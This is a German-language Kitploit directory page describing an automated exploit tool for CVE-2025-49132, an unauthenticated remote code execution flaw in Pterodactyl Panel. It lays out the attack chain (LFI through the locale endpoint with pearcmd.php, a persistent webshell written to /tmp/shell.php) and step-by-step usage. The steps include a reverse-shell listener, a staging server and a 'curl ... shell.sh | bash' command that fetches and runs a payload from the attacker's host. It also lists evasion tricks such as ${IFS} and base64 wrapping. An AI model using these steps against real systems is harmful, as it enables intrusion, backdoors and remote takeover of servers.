Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-49132-Mods — Automatisierter Exploit für CVE-2025-49132, eine kritische, nicht authentifizierte RCE im Pterodactyl Panel. Nutzt LFI über den Locale-Endpunkt, um persistente Web-Shells bereitzustellen und Reverse-Shell-Zugriff zu erlangen. | Kitploit
Tools/GitHubGitHub/malw0re/cve-2025-49132-mods
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubmalw0re/cve-2025-49132-mods

CVE-2025-49132-Mods

Automatisierter Exploit für CVE-2025-49132, eine kritische, nicht authentifizierte RCE im Pterodactyl Panel. Nutzt LFI über den Locale-Endpunkt, um persistente Web-Shells bereitzustellen und Reverse-Shell-Zugriff zu erlangen.

Repository anzeigen
12249vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-49132 - RCE Einfach

Python CVE

📝 Übersicht

Dieses Repository enthält einen speziellen Exploit für CVE-2025-49132, eine kritische, nicht authentifizierte Remote Code Execution (RCE) Schwachstelle im Pterodactyl Panel (vor Version 1.11.11).

Die Schwachstelle befindet sich im Endpunkt /locales/locale.json. Durch Manipulation der Abfrageparameter locale und namespace kann ein Angreifer eine Local File Inclusion (LFI) ausnutzen, um mit pearcmd.php zu interagieren. Dies ermöglicht das Erstellen beliebiger Dateien und die Ausführung von Befehlen, was zu einer vollständigen Systemkompromittierung führt.

⚙️ Exploit-Kette

Das Skript ape.py automatisiert die folgenden Schritte:

PEAR-Erkennung: Fuzzt die Verzeichnisstruktur, um die PEAR-Installation auf dem Ziel zu lokalisieren.

Backdoor-Erstellung: Nutzt PEARs config-create, um eine persistente Webshell nach /tmp/shell.php zu schreiben.

🚀 Nutzungshinweise

Um einen erfolgreichen Callback auf dem Ziel zu erreichen, befolgen Sie diesen Arbeitsablauf:

  1. Vorbereitung Listener: Starten Sie Penelope (oder Ihren bevorzugten Listener) in einem separaten Terminal:

penelope -p 4444

Staging-Server: Wenn Sie ein benutzerdefiniertes Shell-Skript verwenden, hosten Sie es über Python: python3 -m http.server 8080

  1. Ausführung Führen Sie das Skript im interaktiven Modus aus, um die Kontrolle über den Exploit-Prozess zu behalten:

python3 ape.py --host xxx.xxx.xxx --interactive

  1. Shell abfangen Innerhalb der shell>-Eingabeaufforderung verwenden Sie den folgenden Befehl, um Ihre bereitgestellte Payload auszuführen:

shell> curl http://<YOUR_IP>:8080/shell.sh | bash

🛡️ Technische Schutzmaßnahmen

Leerzeichen-Umgehung: Verwendet automatisch ${IFS}, um sicherzustellen, dass Payloads die URL-Analyse überstehen.

Base64-Wrapper: Verpackt Reverse-Shell-Befehle in Base64, um Zeichenverzerrungen durch den Nginx/Webserver des Ziels zu verhindern.

Timeout-Behandlung: Entwickelt, um zu erkennen, wann eine Reverse-Shell erfolgreich verbunden ist, selbst wenn die Webanfrage hängt.

Tool herunterladen